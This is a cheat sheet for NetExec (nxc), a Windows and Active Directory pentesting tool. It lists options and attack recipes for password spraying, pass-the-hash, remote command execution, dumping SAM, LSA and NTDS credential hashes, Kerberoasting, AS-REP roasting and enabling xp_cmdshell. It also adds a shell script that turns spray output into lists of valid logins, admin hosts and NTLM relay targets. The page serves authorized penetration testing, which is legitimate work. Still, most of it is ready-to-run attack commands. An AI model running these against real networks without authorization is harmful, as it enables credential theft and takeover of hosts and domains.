netexec
Network service exploitation tool for pentesting Windows and Active Directory environments; the maintained successor to CrackMapExec (command: nxc). One binary authenticates to many hosts over several protocols, enumerates them, sprays credentials and runs commands.
Quickstart
nxc smb 10.10.10.10 -u user -p password
nxc smb 10.10.10.10 -u user -p password --shares
nxc winrm 10.10.10.10 -u user -p password -x "whoami"
nxc smb 10.10.10.0/24 -u users.txt -p password
Core Concepts
| Concept | Description |
|---|---|
| Protocols | smb, winrm, ldap, mssql, ssh, rdp, wmi (plus ftp, vnc, nfs) |
| Credential testing | Password spraying, pass-the-hash, Kerberos tickets |
| Execution | Remote command execution over smb, winrm, mssql, ssh and wmi |
| Enumeration | Users, groups, shares, sessions, password policy |
Syntax
nxc <protocol> <target> [options]
Options
Target
| Option | Description |
|---|---|
| <target> | IP, CIDR range, hostname/FQDN, or a file with one target per line |
Authentication
| Option | Description |
|---|---|
| -u <user> | Username, or a file with one username per line |
| -p <pass> | Password, or a file with one password per line |
| -H <hash> | NTLM hash for pass-the-hash (NT hash alone or LM:NT) |
| -d <domain> | Domain to authenticate against |
| --local-auth | Authenticate against the host's local SAM instead of the domain |
| -k | Kerberos authentication; the target must be a hostname/FQDN, not an IP. --use-kcache reuses the ticket in KRB5CCNAME |
Execution
| Option | Description |
|---|---|
| -x <cmd> | Execute a cmd.exe command |
| -X <ps> | Execute a PowerShell command |
| --exec-method <m> | SMB execution method: wmiexec (default), smbexec, atexec, mmcexec |
SMB Options
| Option | Description |
|---|---|
| --shares | List shares and the access (READ/WRITE) the account has on each |
| --users | List domain users |
| --groups | List domain groups |
| --loggedon-users | Users currently logged on (needs admin on the target) |
| --sessions | Active SMB sessions |
| --pass-pol | Domain password and lockout policy |
| --rid-brute | Enumerate accounts by RID cycling; often works over a null or guest session |
| --sam | Dump local SAM hashes (needs local admin) |
| --lsa | Dump LSA secrets and cached domain credentials (needs local admin) |
| --ntds | Dump NTDS.dit from a domain controller, via DRSUAPI replication by default or a shadow copy with --ntds vss (needs domain-admin-equivalent rights) |
Output
| Option | Description |
|---|---|
| --log <file> | Write the run's output to a file as well as the terminal |
Every result (hosts, credentials, shares) is also stored in the workspace database; browse it with nxcdb.
Recipes
SMB Enumeration
nxc smb 10.10.10.10 -u user -p password
nxc smb 10.10.10.10 -u user -p password --shares
nxc smb 10.10.10.10 -u user -p password --users
nxc smb 10.10.10.10 -u user -p password --pass-pol
nxc smb 10.10.10.10 -u user -p password --rid-brute
nxc smb 10.10.10.10 -u user -p password --loggedon-users
Credential Attacks
nxc smb 10.10.10.10 -u users.txt -p 'Password123'
nxc smb 10.10.10.10 -u users.txt -p passwords.txt
nxc smb 10.10.10.10 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:hash'
nxc smb 10.10.10.10 -u admin -p password --local-auth
A user file and a password file are tried as a full cross product by default, which can lock accounts: check --pass-pol first, add --no-bruteforce to pair line N of each file instead, and --continue-on-success to keep spraying after the first valid credential.
Command Execution
nxc smb 10.10.10.10 -u admin -p password -x "whoami"
nxc smb 10.10.10.10 -u admin -p password -X "Get-Process"
nxc winrm 10.10.10.10 -u admin -p password -x "whoami"
Credential Dumping
nxc smb 10.10.10.10 -u admin -p password --sam
nxc smb 10.10.10.10 -u admin -p password --lsa
nxc smb dc.target.com -u admin -p password --ntds
nxc smb 10.10.10.10 -u admin -p password --ntds vss
--sam and --lsa need local admin on the target; --ntds only makes sense against a domain controller and replicates every account's hash, which is loud.
Network Scanning
nxc smb 10.10.10.0/24
nxc smb 10.10.10.0/24 -u user -p password
nxc smb hosts.txt -u user -p password
An unauthenticated sweep still prints each host's OS build, domain, and whether SMB signing is required.
LDAP
nxc ldap dc.target.com -u user -p password
nxc ldap dc.target.com -u user -p password --users
nxc ldap dc.target.com -u user -p password --groups
nxc ldap dc.target.com -u user -p password --kerberoasting output.txt
nxc ldap dc.target.com -u user -p password --asreproast output.txt
--kerberoasting and --asreproast write the tickets to the named file in hashcat-ready format.
MSSQL
nxc mssql 10.10.10.10 -u sa -p password
nxc mssql 10.10.10.10 -u sa -p password -q "SELECT @@version"
nxc mssql 10.10.10.10 -u sa -p password -x "whoami"
-q runs a query; -x runs an OS command through xp_cmdshell, which nxc enables when the account has the rights to.
WinRM
nxc winrm 10.10.10.10 -u user -p password
nxc winrm 10.10.10.10 -u user -p password -x "whoami"
nxc winrm 10.10.10.10 -u user -p password -X "Get-Process"
SSH
nxc ssh 10.10.10.10 -u user -p password
nxc ssh 10.10.10.10 -u user -p password -x "id"
Output & Parsing
nxc smb 10.10.10.0/24 -u user -p password --log results.log
nxc smb 10.10.10.0/24 -u user -p password 2>&1 | grep '\[+\]'
nxcdb
Successful logins are marked [+], failures [-], and banner/info lines [*]; "(Pwn3d!)" after a credential means it is a local administrator on that host.
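Grepping for [+] loses the host and access level. This added example (not part of the original page or of NetExec) turns constructed nxc smb output into CSV of valid logins, flags which are admin, and pulls the hosts with SMB signing disabled out of the banner lines, the same set --gen-relay-list would write. The IPs, host names and credentials in SAMPLE are assumptions.

```shell
#!/bin/sh
# Constructed sample of nxc smb output (not real scan data): an unauthenticated
# sweep banner for two hosts followed by a spray of one password.
SAMPLE='SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.11     445    FS01             [*] Windows 10.0 Build 19041 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [+] corp.local\jdoe:Summer2024!
SMB         10.10.10.11     445    FS01             [+] corp.local\jdoe:Summer2024! (Pwn3d!)
SMB         10.10.10.12     445    WS01             [-] corp.local\jdoe:Summer2024! STATUS_LOGON_FAILURE'

# Print "ip,host,user,level" for every successful login. Level is "admin" when
# nxc appended "(Pwn3d!)" (local administrator on that host), otherwise "user".
nxc_valid() {
    awk '$5 == "[+]" {
        split($6, cred, ":")          # "DOMAIN\user:password" -> keep the user part only
        level = (index($0, "(Pwn3d!)") > 0) ? "admin" : "user"
        printf "%s,%s,%s,%s\n", $2, $4, cred[1], level
    }'
}

# Print hosts whose banner reports SMB signing disabled: NTLM relay candidates.
nxc_relay_targets() {
    awk '$5 == "[*]" && index($0, "(signing:False)") > 0 { print $2 }'
}

# Wrappers over the constructed sample so the results can be checked directly.
sample_valid() { printf '%s\n' "$SAMPLE" | nxc_valid; }
sample_relay() { printf '%s\n' "$SAMPLE" | nxc_relay_targets; }

sample_valid
sample_relay
```

In practice feed the functions from a --log file or from `nxc ... 2>&1`; the column positions are stable across protocols, so the same awk works on winrm or ldap output with the protocol column changed.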
Troubleshooting
| Issue | Solution |
|---|---|
| Connection refused / timeout | Check the service is up and the port reachable (445 smb, 5985/5986 winrm, 389/636 ldap, 1433 mssql, 22 ssh) |
| Access denied | Verify the credentials and the domain; for local accounts add --local-auth |
| Kerberos errors | Sync the clock with the DC; use -k with the FQDN rather than an IP, and pass --kdcHost if DNS does not resolve the DC |
| SMB signing | The banner shows (signing:True/False); relay attacks only work against False, and --gen-relay-list relay.txt writes those hosts to a file |
References
https://github.com/Pennyw0rth/NetExec
https://www.netexec.wiki/